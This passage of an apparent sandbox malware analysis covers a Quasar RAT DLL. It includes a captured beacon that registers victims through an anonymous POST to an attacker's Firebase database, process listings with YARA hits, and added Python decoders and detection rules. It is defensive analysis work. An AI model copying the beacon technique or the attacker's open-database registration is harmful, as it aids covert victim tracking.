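    {"id": 2, "process": r"C:\Windows\System32\rundll32.exe", "host_nt": "10.0",
     "raw": raw_request("/", "api.ipify.org", UA_SEEN)},
    {"id": 3, "process": r"C:\Program Files\Mozilla Firefox\firefox.exe", "host_nt": "10.0",
     "raw": raw_request("/", "api.ipify.org",
                        "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0")},
]


def parse_request(raw: str) -> dict:
    """Split an HTTP/1.x request head into request line and a lower-cased header map."""
    head, _, _body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version, "headers": headers}


def reasons_for(session: dict) -> list[str]:
    """Independent weak signals; each one alone is common in benign traffic."""
    req = parse_request(session["raw"])
    host = req["headers"].get("host", "").lower()
    ua = req["headers"].get("user-agent", "")
    exe = session["process"].rsplit("\\", 1)[-1].lower()
    reasons = []
    if host in IP_LOOKUP_HOSTS:
        reasons.append(f"public-IP/geolocation lookup to {host}")
    if ua == UA_SEEN:
        reasons.append("User-Agent matches the Quasar connectivity-check string seen in this report")
    if exe in HOSTING_BINARIES:
        reasons.append(f"{exe} issuing HTTP itself")
    claimed = NT_VERSION.search(ua)
    if claimed and claimed.group(1) != session["host_nt"]:
        reasons.append(f"User-Agent claims Windows NT {claimed.group(1)} on an NT {session['host_nt']} host")
    return reasons


def detect(sessions: list[dict], min_reasons: int = 2) -> list[tuple[int, list[str]]]:
    """Alert when at least min_reasons signals coincide in one request."""
    hits = []
    for session in sessions:
        reasons = reasons_for(session)
        if len(reasons) >= min_reasons:
            hits.append((session["id"], reasons))
    return hits


if __name__ == "__main__":
    for session_id, reasons in detect(SESSIONS):
        print(f"session {session_id}: " + "; ".join(reasons))
```

The control request trips only the lookup-host signal and stays below the threshold; the three report sessions trip all four. Keying on the lookup hosts alone would page on every ipify user, keying on the User-Agent alone is trivially evaded by recompiling, so the rule is written as a conjunction and the UA-versus-host mismatch is the part that survives a string change.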


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49735 | 35.201.97.85 | 443 | 7100 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
2024-07-15 19:07:19 UTC | 192 | OUT | POST /user.json HTTP/1.1
                                Content-Type: application/json; charset=utf-8
                                Host: argentina-e4162-default-rtdb.firebaseio.com
                                Content-Length: 76
                                Expect: 100-continue
                                Connection: Keep-Alive
2024-07-15 19:07:20 UTC | 25 | IN | HTTP/1.1 100 Continue
2024-07-15 19:07:20 UTC | 1 | OUT | Data Raw: 7b
                                Data Ascii: {
2024-07-15 19:07:20 UTC | 75 | OUT | Data Raw: 22 4d 41 51 55 49 4e 41 22 3a 22 4e 7a 45 31 4e 54 63 31 22 2c 22 44 41 54 41 22 3a 22 4d 54 55 75 4d 44 63 75 4d 6a 41 79 4e 43 41 78 4e 54 6f 77 4e 7a 6f 78 4f 41 3d 3d 22 2c 22 50 4c 55 47 49 4e 22 3a 22 4d 41 3d 3d 22 7d
                                Data Ascii: "MAQUINA":"NzE1NTc1","DATA":"MTUuMDcuMjAyNCAxNTowNzoxOA==","PLUGIN":"MA=="}
2024-07-15 19:07:20 UTC | 318 | IN | HTTP/1.1 200 OK
                                Server: nginx
                                Date: Mon, 15 Jul 2024 19:07:20 GMT
                                Content-Type: application/json; charset=utf-8
                                Content-Length: 31
                                Connection: close
                                Access-Control-Allow-Origin: *
                                Cache-Control: no-cache
                                Strict-Transport-Security: max-age=31556926; includeSubDomains; preload
                                {"name":"-O1rmguwaszAMl0bAl2T"}
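The session above is the implant registering its victim: a REST POST to a Firebase Realtime Database path (/user.json) carrying no Authorization header and no auth query parameter, answered 200 OK, so the database's rules accept anonymous writes to that path. Every value in the 76-byte body (the "{" sent first, then the remaining 75 bytes once the server answered 100 Continue) is plain base64 with no key or XOR: MAQUINA (máquina, "machine" in Spanish and Portuguese) is a numeric victim id, DATA is the victim's local clock, PLUGIN is a flag. The reply {"name": ...} is the child key Firebase generates for a POST, i.e. the victim's record id in the attacker's database. The decoder below is an added example, not the sample's or Joe Sandbox's code; the body, reply and Date header are copied from the capture above. The one derived value worth having is the last function: the local time in DATA set against the server's UTC Date header gives the victim's UTC offset.

```python
import base64
import json
from datetime import datetime
from email.utils import parsedate_to_datetime

# Copied from the Firebase session in this report.
BEACON_BODY = '{"MAQUINA":"NzE1NTc1","DATA":"MTUuMDcuMjAyNCAxNTowNzoxOA==","PLUGIN":"MA=="}'
BEACON_REPLY = '{"name":"-O1rmguwaszAMl0bAl2T"}'
SERVER_DATE = "Mon, 15 Jul 2024 19:07:20 GMT"


def decode_beacon(body: str) -> dict:
    """Every field is a base64-wrapped UTF-8 string; one pass recovers the cleartext.
    validate=True rejects anything that is not canonical base64 instead of guessing."""
    fields = json.loads(body)
    out = {k: base64.b64decode(v, validate=True).decode("utf-8") for k, v in fields.items()}
    # DATA is the victim's local wall clock as day.month.year hour:minute:second
    out["local_time"] = datetime.strptime(out["DATA"], "%d.%m.%Y %H:%M:%S")
    return out


def firebase_push_key(reply: str) -> str:
    """A Realtime Database REST POST creates a child under the target path and
    answers {"name": <generated key>}; that key addresses this victim's record."""
    return json.loads(reply)["name"]


def clock_offset_hours(local_time: datetime, server_date: str) -> float:
    """Victim local time (from the beacon) minus server UTC time (from the Date
    header), rounded to the nearest quarter hour so half-hour zones survive."""
    utc = parsedate_to_datetime(server_date).replace(tzinfo=None)
    delta = (local_time - utc).total_seconds()
    return round(delta / 900) * 0.25


if __name__ == "__main__":
    decoded = decode_beacon(BEACON_BODY)
    for key in ("MAQUINA", "DATA", "PLUGIN"):
        print(f"{key:>8}: {decoded[key]}")
    print(f"  record: {firebase_push_key(BEACON_REPLY)}")
    print(f"  offset: UTC{clock_offset_hours(decoded['local_time'], SERVER_DATE):+.2f}h")
```

Two seconds separate the victim's clock (15:07:18) from the server's (19:07:20), so the rounding leaves a clean UTC-4 here; for a real victim that offset, the numeric id and the push key are what to pivot on when the same database shows up in other captures.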


                                Target ID:0
                                Start time:15:07:00
                                Start date:15/07/2024
                                Path:C:\Windows\System32\loaddll64.exe
                                Wow64 process (32bit):false
                                Commandline:loaddll64.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll"
                                Imagebase:0x7ff6182e0000
                                File size:165'888 bytes
                                MD5 hash:763455F9DCB24DFEECC2B9D9F8D46D52
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:1
                                Start time:15:07:00
                                Start date:15/07/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff7699e0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:2
                                Start time:15:07:00
                                Start date:15/07/2024
                                Path:C:\Windows\System32\cmd.exe
                                Wow64 process (32bit):false
                                Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",#1
                                Imagebase:0x7ff680840000
                                File size:289'792 bytes
                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:3
                                Start time:15:07:00
                                Start date:15/07/2024
                                Path:C:\Windows\System32\rundll32.exe
                                Wow64 process (32bit):false
                                Commandline:rundll32.exe C:\Users\user\Desktop\vstdlib_s64.dll.dll,V_FixDoubleSlashes
                                Imagebase:0x7ff7ff470000
                                File size:71'680 bytes
                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000003.00000002.1682910878.000002A89AAA2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000003.00000002.1684076753.00007FFDFB182000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                Reputation:high
                                Has exited:true

                                Target ID:4
                                Start time:15:07:00
                                Start date:15/07/2024
                                Path:C:\Windows\System32\rundll32.exe
                                Wow64 process (32bit):false
                                Commandline:rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",#1
                                Imagebase:0x7ff7ff470000
                                File size:71'680 bytes
                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000004.00000002.1684166716.00007FFDFB182000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000004.00000002.1683326542.000002596EF32000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                Reputation:high
                                Has exited:true

                                Target ID:5
                                Start time:15:07:03
                                Start date:15/07/2024
                                Path:C:\Windows\System32\rundll32.exe
                                Wow64 process (32bit):false
                                Commandline:rundll32.exe C:\Users\user\Desktop\vstdlib_s64.dll.dll,V_FixSlashes
                                Imagebase:0x7ff7ff470000
                                File size:71'680 bytes
                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000005.00000002.1711858916.00007FFDFB182000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000005.00000002.1711125446.0000024C76552000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                Reputation:high
                                Has exited:true

                                Target ID:6
                                Start time:15:07:06
                                Start date:15/07/2024
                                Path:C:\Windows\System32\rundll32.exe
                                Wow64 process (32bit):false
                                Commandline:rundll32.exe C:\Users\user\Desktop\vstdlib_s64.dll.dll,V_IsAbsolutePath
                                Imagebase:0x7ff7ff470000
                                File size:71'680 bytes
                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000006.00000002.1742655748.000001C4BEC02000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000006.00000002.1743520661.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                Reputation:high
                                Has exited:true

                                Target ID:7
                                Start time:15:07:09
                                Start date:15/07/2024
                                Path:C:\Windows\System32\rundll32.exe
                                Wow64 process (32bit):false
                                Commandline:rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_FixDoubleSlashes
                                Imagebase:0x7ff7ff470000
                                File size:71'680 bytes
                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000007.00000002.1800566707.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000007.00000002.1789628850.000002755E652000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                Reputation:high
                                Has exited:true

                                Target ID:8
                                Start time:15:07:10
                                Start date:15/07/2024
                                Path:C:\Windows\System32\rundll32.exe
                                Wow64 process (32bit):false
                                Commandline:rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_FixSlashes
                                Imagebase:0x7ff7ff470000
                                File size:71'680 bytes
                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000008.00000002.1798585277.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000008.00000002.1782774058.000001DD420A2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                Reputation:high
                                Has exited:true

                                Target ID:9
                                Start time:15:07:10
                                Start date:15/07/2024
                                Path:C:\Windows\System32\rundll32.exe
                                Wow64 process (32bit):false
                                Commandline:rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_IsAbsolutePath
                                Imagebase:0x7ff7ff470000
                                File size:71'680 bytes
                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000009.00000002.1803017561.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000009.00000002.1795742842.0000013F23772000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                Reputation:high
                                Has exited:true

                                Target ID:10
                                Start time:15:07:10
                                Start date:15/07/2024
                                Path:C:\Windows\System32\rundll32.exe
                                Wow64 process (32bit):false
                                Commandline:rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_vsnwprintf
                                Imagebase:0x7ff7ff470000
                                File size:71'680 bytes
                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000A.00000002.1806601416.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000A.00000002.1799338023.000001EDF6DB2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                Reputation:high
                                Has exited:true

                                Target ID:11
                                Start time:15:07:10
                                Start date:15/07/2024
                                Path:C:\Windows\System32\rundll32.exe
                                Wow64 process (32bit):false
                                Commandline:rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_strncpy
                                Imagebase:0x7ff7ff470000
                                File size:71'680 bytes
                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000B.00000002.1803940812.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000B.00000002.1796633648.000001D54AB72000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                Reputation:high
                                Has exited:true

                                Target ID:12
                                Start time:15:07:10
                                Start date:15/07/2024
                                Path:C:\Windows\System32\rundll32.exe
                                Wow64 process (32bit):false
                                Commandline:rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_strncat_length
                                Imagebase:0x7ff7ff470000
                                File size:71'680 bytes
                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000C.00000002.1803576304.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000C.00000002.1795862473.000002CAF50D2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                Reputation:high
                                Has exited:true

                                Target ID:13
                                Start time:15:07:10
                                Start date:15/07/2024
                                Path:C:\Windows\System32\rundll32.exe
                                Wow64 process (32bit):false
                                Commandline:rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_strncat
                                Imagebase:0x7ff7ff470000
                                File size:71'680 bytes
                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000D.00000002.1801854722.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000D.00000002.1794101772.000001E0A1962000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                Has exited:true

                                Target ID:14
                                Start time:15:07:10
                                Start date:15/07/2024
                                Path:C:\Windows\System32\rundll32.exe
                                Wow64 process (32bit):false
                                Commandline:rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_snprintf
                                Imagebase:0x7ff7ff470000
                                File size:71'680 bytes
                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000E.00000002.1805439876.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000E.00000002.1798302966.0000023D3F972000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                Has exited:true

                                Target ID:15
                                Start time:15:07:10
                                Start date:15/07/2024
                                Path:C:\Windows\System32\rundll32.exe
                                Wow64 process (32bit):false
                                Commandline:rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_UTF8ToUTF16
                                Imagebase:0x7ff7ff470000
                                File size:71'680 bytes
                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000F.00000002.1805465891.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000F.00000002.1798309140.000002D2EC852000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                Has exited:true

                                Target ID:16
                                Start time:15:07:10
                                Start date:15/07/2024
                                Path:C:\Windows\System32\rundll32.exe
                                Wow64 process (32bit):false
                                Commandline:rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_UTF16ToUTF8
                                Imagebase:0x7ff7ff470000
                                File size:71'680 bytes
                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000010.00000002.2929241294.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000010.00000002.2926634464.0000020471362000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                Has exited:false

                                Target ID:17
                                Start time:15:07:10
                                Start date:15/07/2024
                                Path:C:\Windows\System32\rundll32.exe
                                Wow64 process (32bit):false
                                Commandline:rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_StripTrailingSlash
                                Imagebase:0x7ff7ff470000
                                File size:71'680 bytes
                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000011.00000002.1803619460.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000011.00000002.1795873767.0000019D796C2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                Has exited:true

                                Target ID:18
                                Start time:15:07:10
                                Start date:15/07/2024
                                Path:C:\Windows\System32\rundll32.exe
                                Wow64 process (32bit):false
                                Commandline:rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_StripLastDir
                                Imagebase:0x7ff7ff470000
                                File size:71'680 bytes
                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000012.00000002.1800394851.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000012.00000002.1787872788.000001FBE5A92000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                Has exited:true

                                Target ID:19
                                Start time:15:07:10
                                Start date:15/07/2024
                                Path:C:\Windows\System32\rundll32.exe
                                Wow64 process (32bit):false
                                Commandline:rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_RemoveDotSlashes
                                Imagebase:0x7ff7ff470000
                                File size:71'680 bytes
                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000013.00000002.1802596768.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000013.00000002.1794900321.0000024F7DFE2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                Has exited:true
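                                The process list above shows how the sandbox exercised the DLL: loaddll64.exe went through cmd.exe to run rundll32.exe with ordinal #1, then launched one rundll32.exe per named export (V_FixDoubleSlashes, V_FixSlashes, V_IsAbsolutePath and so on). Every one of those processes matched the Quasar YARA rule, so the entry point is irrelevant to detection; what matters is rundll32.exe loading a DLL from a user-writable path. The Python below is an added example, not part of the report, and parses rundll32 command lines of both shapes seen here (quoted path with an ordinal, bare path with a named export) and flags those whose DLL lives under a user-writable directory. The sample lines are constructed to mirror the process table, and the list of user-writable prefixes is an assumption for the example.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Command lines constructed from the process list above.
SAMPLE_CMDLINES = [
    'rundll32.exe "C:\\Users\\user\\Desktop\\vstdlib_s64.dll.dll",#1',
    "rundll32.exe C:\\Users\\user\\Desktop\\vstdlib_s64.dll.dll,V_FixDoubleSlashes",
    'rundll32.exe "C:\\Users\\user\\Desktop\\vstdlib_s64.dll.dll",V_UTF16ToUTF8',
    'cmd.exe /C rundll32.exe "C:\\Users\\user\\Desktop\\vstdlib_s64.dll.dll",#1',
    "C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1",
]

# Directories an unprivileged user can write to. Assumed list for the example,
# not taken from the report; extend it to match your environment.
USER_WRITABLE_PREFIXES = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")

# rundll32[.exe] <"quoted path" | bare path>,<export name | #ordinal>
_RUNDLL_RE = re.compile(
    r'rundll32(?:\.exe)?\s+(?:"(?P<qdll>[^"]+)"|(?P<dll>[^,\s]+)),\s*(?P<entry>\S+)',
    re.IGNORECASE,
)


@dataclass(frozen=True)
class RunDllCall:
    dll: str
    entry: str
    ordinal: Optional[int]

    @property
    def from_user_writable_dir(self) -> bool:
        return self.dll.lower().startswith(USER_WRITABLE_PREFIXES)


def parse_rundll32(cmdline: str) -> Optional[RunDllCall]:
    """Extract DLL path and entry point from a rundll32 command line.

    Searches anywhere in the line, so a cmd.exe /C wrapper around rundll32
    is matched as well. Returns None when the line does not run rundll32.
    """
    m = _RUNDLL_RE.search(cmdline)
    if not m:
        return None
    dll = m.group("qdll") or m.group("dll")
    entry = m.group("entry")
    ordinal = int(entry[1:]) if entry.startswith("#") and entry[1:].isdigit() else None
    return RunDllCall(dll=dll, entry=entry, ordinal=ordinal)


def suspicious_rundll32(cmdlines: List[str]) -> List[RunDllCall]:
    """Return rundll32 invocations that load a DLL from a user-writable path."""
    hits = []
    for line in cmdlines:
        call = parse_rundll32(line)
        if call is not None and call.from_user_writable_dir:
            hits.append(call)
    return hits


if __name__ == "__main__":
    for hit in suspicious_rundll32(SAMPLE_CMDLINES):
        print(f"{hit.dll} -> {hit.entry} (ordinal={hit.ordinal})")
```

                                The cmd.exe wrapper line is reported alongside its rundll32 child on purpose: both carry the DLL path, and in telemetry you may only have one of them. Keying the rule on the DLL path rather than the export name is what lets it catch all 17 rundll32 processes in this report with one condition.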

                                No disassembly